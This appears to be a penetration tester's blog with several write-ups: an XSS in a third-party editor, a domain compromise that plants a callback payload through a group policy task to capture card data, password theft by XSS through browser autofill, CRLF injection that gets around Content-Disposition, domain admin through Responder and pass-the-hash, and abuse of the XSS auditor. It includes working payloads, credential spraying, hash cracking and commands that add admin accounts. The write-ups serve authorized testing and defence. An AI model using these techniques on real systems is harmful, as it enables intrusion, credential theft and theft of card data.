Normal view

There are new articles available, click to refresh the page.
Before yesterdaymarkitzeroday.com

XSS Hunting

3 March 2020 at 08:55

This post documents one of my findings from a bug bounty program. The program had around 20 web applications in scope. Luckily the first application I chose was a treasure trove of bugs, so that kept me busy for a while. When I decided to move on, I picked another one at random, which was the organisation’s recruitment application.

I found a cross-site scripting (XSS) vulnerability via an HTML file upload, but unfortunately the program manager marked this as a duplicate. In case you’re not familiar with bug bounties, this is because another researcher had found and logged the vulnerability with the program manager before me, and only the first submission on any valid bug is considered for reward.

After sifting through the site a few times, it appeared that all the low hanging fruit had gone. Time to bring out the big guns.

Big Guns

This time it’s in the form of my new favourite fuzzer ffuf.

ffuf -w /usr/share/wordlists/dirb/big.txt -u https://rob-sec-1.com/FUZZ -o Ffuf/Recruitment.csv -X HEAD -of csv

This is like the directory fuzzers of old, like dirb and dirbuster, however, it is written in Go, which is much much faster.

What this tool will do is try to enumerate different directories within the application, replacing FUZZ with items from the big.txt list of words. If we sneak peek a sample of this file:

$ shuf -n 10 /usr/share/wordlists/dirb/big.txt
odds
papers
diamonds
beispiel
comunidades
webmilesde
java-plugin
65
luntan
oldshop

…ffuf wil try URL paths such as https://rob-sec-1.com/odds, https://rob-sec-1.com/papers https://rob-sec-1.com/diamonds, etc, and report on what it finds. The -X parameter tells it to use the HEAD HTTP method, which will only retrieve HTTP headers from the target site rather than full pages. Usually retrieving HEAD will be enough to determine whether that hidden page exists or not. The thing I like most about ffuf, is the auto calibrate option, which determines “what is normal” for an application to return. I’ve not used this option here, but if you pass the -ac parameter (I don’t recommend this with -x HEAD), it will grab a few random URL paths of its own to see if the application follows the web standard of returning HTTP 404 errors for non-existent pages, or whether it returns something else. In the latter case, if something non-standard is returned, ffuf will often determine what makes this response unique, and tune its engine to only output results that are different than usual, and thus worthy of investigation. This will use page response size as one of the factors, which is the reason that I don’t recommend that -x HEAD is used, as this does not return the body nor its size, therefore auto calibration will be heavily restricted.

Anyway, back to the application. Ffuf running:

Ffuf runnung

Running the above generated the following CSV that we can read from the Linux terminal using the column command:

column -s, -t Ffuf/Recruitment.csv

Ffuf output

The result I have highlighted above jumped out at me. Third party tools deployed to a web application can be a huge source of vulnerabilities, as the code can often be dropped in without review, and as it is working, tends to get forgotten about and never updated. A quick Google revealed that this was in fact from a software package called ZeroEditor, and was probably not just a directory made on the site:

Google

Note that, as usual, I have anonymised and recreated the details of the application, the third party software, and the vulnerability in my lab. Details have been changed to protect the vulnerable. If you Google this you won’t find an ASP.NET HTML editor as the first result, and my post has nothing to do with the websites and applications that are returned.

From the third party vendor’s website I downloaded the source code that was available in a zip, and then used the following command to turn the installation directory structure into my own custom wordlist:

find . -type f > ../WebApp/ZeroEditor-Fuzz-All.txt

In this file I noticed lots of “non-dangerous” file types such as those in the “Images” directory, so I filtered this like so:

cat ZeroEditor-Fuzz-All.txt | grep -v 'Images' > ZeroEditor-Fuzz-No-Images.txt

Now we can see the top few lines from the non-filtered, and the filtered custom word lists for this editor:

Filter

Now we can run ffuf again, this time using the custom word list we made:

ffuf -w ZeroEditor-Fuzz-No-Images.txt -u https://rob-sec-1.com/ZeroEditor/FUZZ -o Ffuf/Recruitment-ZeroEditor-Fuzz.csv -X HEAD -of csv -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' -t 1

This time we are only running one thread (-t 1), as from our earlier fuzzing we can tell the web app or its server isn’t really up to much performance wise, so in this instance we are happy to go slow.

Ffuf with Custom List

and we can show in columns as before:

Ffuf columnds with Custom List

My attention was drawn to the last two results. An ASPX - could there be something juicy in there? Also a Shockwave Flash file. I did actually decompile the latter, but it turned out just to be a standard Google video player, and I couldn’t find any XSS or anything else that interesting in the code.

Going back to Spell-Check-Dialog.aspx. What could we do here, with this discovered file?

Loading the page directly gave the following:

Spellchecker Page

Initially my go-to would have been param-miner, which can find hidden parameters like i did here using wfuzz. The difference is that param-miner is faster as it will try multiple parameters at once by employing a binary search, and it will also use an algorithmic approach for detecting differences in content without you having to specify what the baseline is (similar to Ffuf in this regard).

But we don’t need to do that as I already have the source code! I could do a code analysis to look for vulnerabilities ourselves.

Examining the code I found the following that reflected a parameter:

<asp:panel id="DialogFrame" runat="server" visible="False" enableviewstate="False">
            <iframe id="SpellFrame" name="SpellFrame" src="Spell-Check-Dialog.aspx?ZELanguage=<%=Request.Params["ZELanguage"]%>" frameborder="0" width="500" scrolling="no" height="340" style="width:500;height:340"></iframe>
        </asp:panel>

That is the code <%=Request.Params["ZELanguage"]%> outputs ZELanguage from the query string or POST data without doing the thing that mitigates cross-site scripting - output encoding.

However, when I went ahead and passed the query string for ZELanguage nothing happened:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?ZELanguage=FOOBAR

No XSS

I guessed this could be due to the default visible="False" in the above asp:panel tag. After further examination I found the code to make DialogFrame visible:

  void Page_Init(object sender, EventArgs e)
    {
         // show iframe when needed for MD support
         if (Request.Params["MD"] != null)
         {
             this.DialogFrame.Visible = true;
             return;
         }         

In summary, it looked like I just needed to set MD to something as well. Hence from the hidden page I found the two hidden query string parameters: MD=true&ZELanguage=FOOBAR.

And reviewing the code to find out how it worked enabled me to construct the new query string:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?MD=true&ZELanguage=FOOBAR"></iframe><script>alert(321)</script>

Bingo, XSS:

XSS

This would have been mitigated if the vendor had encoded on output: <%=Server.HTMLEncode(Request.Params["ZELanguage"]) %>

There was another file in the downloaded zip that if present could possibly have allowed Server-Side Request Forgery (SSRF) or directory traversal, however, this was not found during fuzzing of the target, suggesting it has been deleted after deployment. There were also some directory manipulation pieces of code within Spell-Check-Dialog.aspx that takes user input as part of the path, however, it doesn’t appear to be doing anything too crazy with the file and it also has a static file extension appended making it of limited use. That leaves us with XSS for now, and although I have found some more juicy findings on the bug bounty program, they are more difficult to recreate in a lab environment. It would be nice to release them should the program manager’s client allow this in future.

Timeline

  • 27 December 2019: Reported to the program manager.
  • 29 December 2019: Triaged by the program manager.
  • 03 March 2020: Reported to vendor of HTML Editor as it occurred to me to check whether the latest version was vulnerable when writing this post. A cursory glance suggested it was. No details of any vulnerable targets disclosed to vendor, as the code itself is vulnerable.
  • 28 April 2020: Rewarded $400 from bug bounty program.
  • TBA: Response from vendor.
  • 19 May 2020: Post last updated.

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

24 April 2019 at 20:02

This post details how to bypass firewalls to gain access to the Cardholder Data Environment (or CDE, to use the parlance of our times). End goal: to extract credit card data.

Without intending to sound like a Payment Card Industry (PCI) auditor, credit card data should be kept secure on your network if you are storing, transmitting or processing it. Under the PCI Data Security Standard (PCI-DSS), cardholder data can be sent across your internal network, however, it is much less of a headache if you implement network segmentation. This means you won’t have to have the whole of your organisation in-scope for your PCI compliance. This can usually be achieved by firewalling the network ranges dealing with card data, the CDE, from the rest of your organisation’s network.

Hopefully, the above should outline the basics of a typical PCI setup in case you are not familiar. Now onto the fun stuff.

As usual, details have been changed here to protect client-confidential data. The company in question had a very large network, all on the standard 10.0.0.0/8 range. Cardholder data was on a separate 192.168.0.0/16 range, firewalled from the rest of the company. The CDE mostly consisted of call centre operatives taking telephone orders, and entering payment details into a form on an externally operated web application.

This was an internal penetration test, therefore we were connected to the company’s internal office network on the 10.0.0.0/8 range. Scanning the CDE from this network location with ping and port scans yielded no results:

no-ping

no-ports

The ping scan is basically the same as running the ping command but nmap can scan a whole range with one run. The “hosts up” in the second command’s output relate to the fact we’ve given nmap the -Pn argument to tell it not to first ping, therefore nmap will report all hosts in the range as “up” even though they might not be (an nmap quirk).

So unless there was a firewall rule bypass vulnerability, or a weak password for the firewall that could be guessed, going straight in through this route seemed unlikely. Therefore, the first step of the compromise was to concentrate on taking control of Active Directory by gaining Domain Admin privileges.

Becoming Domain Admin

There are various ways to do this, such as this one in my previous post.

In this instance, kerberoast was utilised to take control of the domain. A walk through of the attack, starting off from a position of unauthenticated on the domain follows.

The first step in compromising Active Directory usually involves gaining access to any user account, at any level. As long as it can authenticate to the domain controller in some way, we’re good. In Windows world, all accounts should be able to authenticate with the domain controller, even if they have no permissions to actually do anything on it. At a most basic level, even the lowest privileged accounts need to validate that the password is correct when the user logs in, so this is a reason it works that way.

At this customer’s site, null sessions were enabled on the domain controller. In this case, our domain controller is 10.0.12.100, “PETER”. This allows the user list to be enumerated using tools like enum4linux, revealing the username of every user on the domain:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

enum-started

enum-found

Now we have a user list, we can parse it into a usable format:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

enum-extracted-users

You may have noticed I’m not into the whole brevity thing. Yes, you can accomplish this with awk, grep, sed and/or even Perl with many fewer characters, however, if I’m on a penetration test I tend to just use whatever works and save my brain power for achieving the main goal. If I’m writing a script that I’m going to use long term, I may be tempted to optimise it a bit, but for pentesting I tend to bash out commands until I get what I need (pun intended).

Now on the actual test. The network is huge, with over 25,000 active users. However, in my lab network we only have a handful, which should make it easier to demonstrate the hack.

Now we have the user list parsed into a text file, we can then use a tool such as CrackMapExec to guess passwords. Here we will guess if any of the users have “Password1” as their password. Surprisingly enough, this meets the default complexity rules of Active Directory as it contains three out of the four character types (uppercase, lowercase and number).

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow we have a hit:

cme-password-found

Note that if we want to keep guessing and find all accounts, we can specify the --continue-on-success flag:

cme-continue

So we’ve gained control of a single account. Now we can query Active Directory and bring down a list of service accounts. Service accounts are user accounts that are for… well… services. Think of things like the Microsoft SQL Server. When running, this needs to run under the context of a user account. Active Directory’s Kerberos authentication system can be used to provide access, and therefore a “service ticket” is provided by Active Directory to allow users to authenticate to it. Kerberos authentication is outside the scope of this post, however, this is a great write-up if you want to learn more.

Anywho, by requesting the list of Kerberos service accounts from the domain controller, we also get a “service ticket” for each. This service ticket is encrypted using the password of the service account. So if we can crack it, we will be able to use that account, which is usually of high privilege. The Impacket toolset can be used to request these:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

spns

As we can see, one of the accounts is a member of Domain Admins, so this would be a great password to crack.

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

After running hashcat against it, it appears we have found the plaintext password:

spn-cracked

To confirm that this is an actual active account, we can use CrackMapExec again.

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

spn-user-da

Wahoo, the Pwn3d! shows we have administrator control over the domain controller.

da

OK, how to use it to get at that lovely card data?

Now, unfortunately for this company, the machines the call centre agents were using within the CDE to take phone orders were on this same Active Directory domain. And although we can’t connect to these machines directly, we can now tell the domain controller to get them to talk to us. To do this we need to dip into Group Policy Objects (GPOs). GPOs allow global, or departmental, settings to be applied to both user and computers. Well, it’s more than that really, however, for the purposes of this post you just need to know that it allows control of computers in the domain on a global or granular level.

Many of the functions of GPO are used to manage settings of the organisational IT. For example, setting a password policy or even setting which desktop icons appear for users (e.g. a shortcut to open the company’s website). Another GPO allows “immediate scheduled tasks” to be run. This is what we’re doing here… Creating a script which will run in the call centre, and connect back to the our machine, giving us control. Here are the steps to accomplish this:

  1. Generate a payload. Here we’re using Veil Evasion. Our IP address is 10.0.12.1, so we’ll point the payload to connect back to us at this address.
    $ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell veil

  2. Login to the domain controller over Remote Desktop Protocol (RDP), using the credentials we have from kerberoasting.
    rdp

  3. Find the CDE in Active Directory. From our knowledge of the organisation, we know that the call centre agents work on floor 2. We notice Active Directory Users and Computers (ADUC) has an OU of this name:
    aduc-floor2

  4. Drop in the script we made from Veil into a folder, and share this on the domain controller. Set permissions on both the share and the directory to allow all domain users to read.
    dc-share

  5. Within GPO, we create a policy at this level:
    gpo-1

  6. Find the Scheduled Tasks option while editing this new GPO, and create a new Immediate Scheduled Task:
    gpo-2

  7. Create the task to point to the version saved in the share. Also set “Run in logged-on user’s security context” under “common”.
    task

Done!

I waited 15 minutes and nothing happened. I know that group policy can take 90 minutes, plus or minus 30 to update, but I was thinking that at least one machine would have got the new policy by now (note, if testing this in a lab you can use gpupdate /force). Then I waited another five. I was just about to give up and change tack, then this happened:

meterpreter-opened

Running the command to take a screenshot, returned exactly what the call centre agent was entering at the time… card data!:

card-data

Card data was compromised, and the goal of the 11.3 PCI penetration test was accomplished.

goal

If we have a look at the session list, we can see that the originating IP is from the 192.168.0.0/16 CDE range:

metasploit-sessions

On the actual test the shells just kept coming, as the whole of the second floor sent a shell back. There was something in the region of 60-100 Meterpreter shells that were opened.

Note that Amazon is used in my screenshot, which is nothing to do with the organisation I’m talking about. In the real test, a script was setup in order to capture screenshots upon a shell connecting (via autorunscript), then we could concentrate on the more interesting sessions, such as those that were part way through the process and were about to reach the card data entry phase.

There are other ways of getting screenshots like use espia in Meterpreter, and Metasploit’s post/windows/gather/screen_spy.

There are methods of doing the GPO programatically, which I have not yet tried such as New-GPOImmediateTask in PowerView.

The mitigation for this would to always run the CDE on its own separate Active Directory domain. Note that not even a forest is fine. Of course, defence-in-depth measures of turning off null sessions, encouraging users to select strong passwords and making sure that any service accounts have crazy long passwords (20+ characters, completely random) are all good. Also detecting if any users go and request all service tickets in one go, or creating a honeypot service account that could be flagged if anyone requests the service ticket could help too. No good keeping card holder data safe if a hacker can get to the rest of your organisation.

Password Autocomplete and Modern Browsers

8 July 2018 at 16:26

On many penetration test reports (including mine), the following is reported:


Password Field With Autocomplete Enabled

The page contains a form with the following action URL:

https://rob-sec-1.com/blog/autocomplete.php

The form contains the following password field with autocomplete enabled:

password

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker that gains control over the user’s computer. Further, an attacker that finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user’s browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete=”off” within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



Now this one is an awkward one to report, because saving passwords for the user is a good thing. MDN says on the matter:

in-browser password management is generally seen as a net gain for security. Since users do not have to remember passwords that the browser stores for them, they are able to choose stronger passwords than they would otherwise.

I completely agree with this. Password managers (even browser built-in ones) are better than using the same passwords across all sites, or subtle variations on one (monkey1Facebook, monkey1Twitter, etc.).

Users should have their local devices protected (by this I mean mobile devices and desktop machines). This means a password, PIN or fingerprint or equivalent to login, and encryption enabled (FDE, like BitLocker, or device enabled, like Android encryption), to prevent anything being extracted from the file system.

Therefore, the browser storing the password for the use of the user, is of very little risk. The main risk here, is what the Burp description of the vulnerability touches upon above:

cross-site scripting [XSS] may be able to exploit this to retrieve a user’s browser-stored credentials.

Yikes! So XSS could grab the credentials from your browser. To find out whether your browser is vulnerable, I’ve setup a test.

Login to your password manager, click the following link and then enter username: admin and password: secretPassword and when your browser asks you to save your password, do it. Go!

Then try the next link preloaded with this juicy XSS payload

<script>
document.body.onload=setTimeout(
function() {
    alert(document.getElementById('password').value)
    }
    ,1000)
</script>

The one second delay is to give the browser time to complete the form. However, this can be altered with the delay parameter in case your browser needs longer.

Test

So if an alert box is shown with your password, your browser or password manager is vulnerable. In a real attack there will be no alert box, the attacker sends the password (and of course, username using the same method) cross-domain to their site like this (open dev tools or Burp to see the background request).

The next link has autocomplete off. There are two tests you can do here.

  1. Find out whether your password is still completed from before. Many modern browsers ignore the autocomplete directive.
  2. Don’t do this test yet, but if you try a new login (e.g. root and pass), see whether your browser prompts you to save.

Autocomplete Off

The second test may prevent your browser from auto-filling anything in future on this domain without you manually clicking (as you now have two possible logins to the site). Delete one of the logins from your browser/manager if you tried this test.

If your browser still autocompletes, this shows that setting autocomplete=off is pretty pointless for users with the same browser and password manager combination.

Attacker Injected Form

If autocomplete=off made a difference to the above, then the point of my post is to show you whether an attacker injected form could re-enable autocomplete and then capture your credentials, should a cross-site scripting vulnerability exist on the site, and that you were unlucky enough to follow an attacker controlled link.

Before starting, make sure you only have one login saved. See the following guide on how to delete passwords if you tried the second test above. Click this link then your browser version and click back to return to this site: How to delete passwords.

This one has autocomplete off, however, an attacker injects their own form tag via the XSS vector, with autocomplete on to try and grab the password from it:

Attacker Injected Form

This works by closing the original form in the HTML, and then opening another one without autocomplete disabled before injecting the script:

</form><form><script...

If this test worked, but the second test didn’t, then removing autocomplete from a form is like closing the stable door after the horse has bolted. The password has already been saved and any future XSS attacks can grab their password.

Firefox 61, Edge 42 and IE 11 appear to be vulnerable, so if you have cross-site scripting on your site and a user has saved passwords, then the attacker can trivially grab the login details should their XSS link be followed. Chrome 67 appears to pre-fill the password, however, the script alert is empty, suggesting that Chrome has some clever logic built-in preventing script from retrieving it. I wonder if there’s a way around this for an attacker…? Maybe an idea for a future post.

The solution to this would be to use a password manager that requires the user to click before completing the password. This would stop a cross-site scripting attack from sending the password to the user automatically. Of course, if the user proceeded to login, the cross-site scripting could have attached an event handler to the password field in order to send once it had been entered. Changing your password manager will guard against completely automated attacks that do not require further user interaction.

So to avoid being a victim yourself:

  • If the “attacker injected form” test gets your password, switch to a password manager that requires you to click before completing your login details.
  • For sensitive sites, bookmark the logon page and always follow your bookmark when logging in, never follow links from emails, other sites or from messages.

From a pentesting perspective it looks like we’re stuck reporting it, especially for PCI tests:

there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

So to sum up, password managers are great and increase overall security. However, if they complete forms without asking, they make an attacker’s work easy.

Defeating Content-Disposition

16 April 2018 at 23:00

The Content-Disposition response header tells the browser to download a file rather than displaying it in the browser window.

Content-Disposition: attachment; filename="filename.jpg"

For example, even though this HTML outputs <script>alert(document.domain)</script>, because of the header telling the browser to download, it means that no Same Origin Policy bypass is achieved:

Save As

This is a great mitigation for cross-site scripting where users are allowed to upload their own files to the system. HTML files are the greatest threat, a user uploading an HTML file containing script can instantly refer others to the download link. If the browser does not force the content to download, the script will execute in the context of the download URL’s domain, giving the uploader access to the client-side of the victim’s session (the one that clicked the link). Of course, you could serve any downloads from another domain, however, if only authorised users should have access to the file then this means implementing some cross-domain authentication system, which could be prone to security flaws in its own right. Note that ideally (from the attacker’s perspective), any uploads should be able to be downloaded by other users, or should at least be shareable, otherwise we are only in self-XSS territory here, which in my opinion is a non-vuln.

As well as the obvious HTML, there are also ways to bypass the SOP by uploading Flash or a PDF and then embedding the upload on the attacker’s page.

So… can Content-Disposition be bypassed? There were a few old methods that relies on either Internet Explorer caching bugs or Firefox bugs:

(Links stolen from here.)

Well on a recent pentest, I found another way. Admittedly, this was unique to the application, however, I’m sure it will not be the only one vulnerable in this way.

The application in question included a page designer, and the page designer widget allowed images to be uploaded to be included in the page. Upload functionality can be a gold mine for pentesters, so I immediately got testing it. Unfortunately, trying to upload a file of type text/html gave a 400 Bad Request. In fact, trying to upload anything except images gave the same response. Even when the client gave me access to the source code, I validated it and the code appeared sound - only allowing uploads of a white-list of allowed types.

If a file was uploaded, it was downloaded by the browser in a response that included the content-disposition header:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:19:25 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: image/png
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=foobar.png
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, what the client appeared to have forgotten was that there was a back-end API service, and that normal users could authenticate to this service by passing in their app username and password into a basic auth header.

This header is a request header and is in the following format:

Authorization: <type> <credentials>

In the basic mode this is:

Authorization: basic base64(username:password)

So to demonstrate, you can use an online tool such as this one. If your username is foo and your password is bar you would pass in the following header:

Authorization: basic Zm9vOmJhcg=

This is foo:bar base64’d.

Passing this to the API, which was publicly available but ran on port 8875, allowed access to its functions as the authenticated user.

The first flaw I found is that the API allowed any content-type to be uploaded, even those that were disallowed if using the web UI:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg=
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html"}

Obviously, this is simplified and anonymised from the original app. Anyway, this gave the following HTTP response:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788421"}

Requesting the file actually returned the content-type:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:24:11 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, that pesky content-disposition was preventing us from gaining XSS.

What I next tried was setting the type to text/html\r\n\foo:bar, thinking that this would not work. However, it uploaded fine and upon requesting the download I got the injected header returned:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:44:35 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
foo:bar
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Interesting… My first go at bypassing content-dispostion was to inject another content-disposition header, hoping the browser would act on the first one:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:45:52 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
content-disposition: inline
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, the browser flagged this with the following error, which I’ve never seen the likes of before:

Duplicate Content-Disposition

After a bit of thought, I came up with the following payload instead:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg=
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html\r\n\r\n"}

This gave me the ID as before:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788444"}

And requesting

https://10.10.65.26/en-GB/files/10000006788444/download

gave the XSS:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 17:34:21 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html

Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Alert

This is due to the injected carriage-return and linefeed which causes the browser to interpret the second, original, content-disposition header as part of the HTTP body, and therefore ignored as a directive to tell the browser to download. Of course, this does need some social engineering as you would require your victim to follow the link to the downloaded file to trigger the JavaScript in their login context.

Gaining Domain Admin from Outside Active Directory

4 March 2018 at 11:06

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, initially part time and now full time, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test for a client I did earlier in the year. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

reponder

Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call we try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password.

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM.

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).

To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM as the password which will cause Metasploit to pass-the-hash.

metasploit options

Once ran, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC for our pentest, in real life or to remain more stealthy we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y function to suppress the prompt Windows gives you for adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

How to Use X-XSS-Protection for Evil

10 February 2018 at 19:33

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to help prevent reflected XSS from firing. The first header controls that within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically including anything other than unsafe-inline as a directive means that injected JavaScript into the page will not execute, and can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here, however, detailed information regarding the header can be found here.

What I wanted to show you was the difference between specifying block, and either not including the header at all (which therefore will take on the setting in the browser) or specifying 1 without block. Also, for good measure I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you a way that if a site has specified X-XSS-Protection without block, how this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work from Firefox, as at the time of writing Firefox doesn’t include any XSS auditor and therefore is very open to reflected XSS should the visited site be vulnerable. There is the add-on noscript that you can use to protect yourself, should Firefox be your browser of choice. Note the following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URl:

abused source code

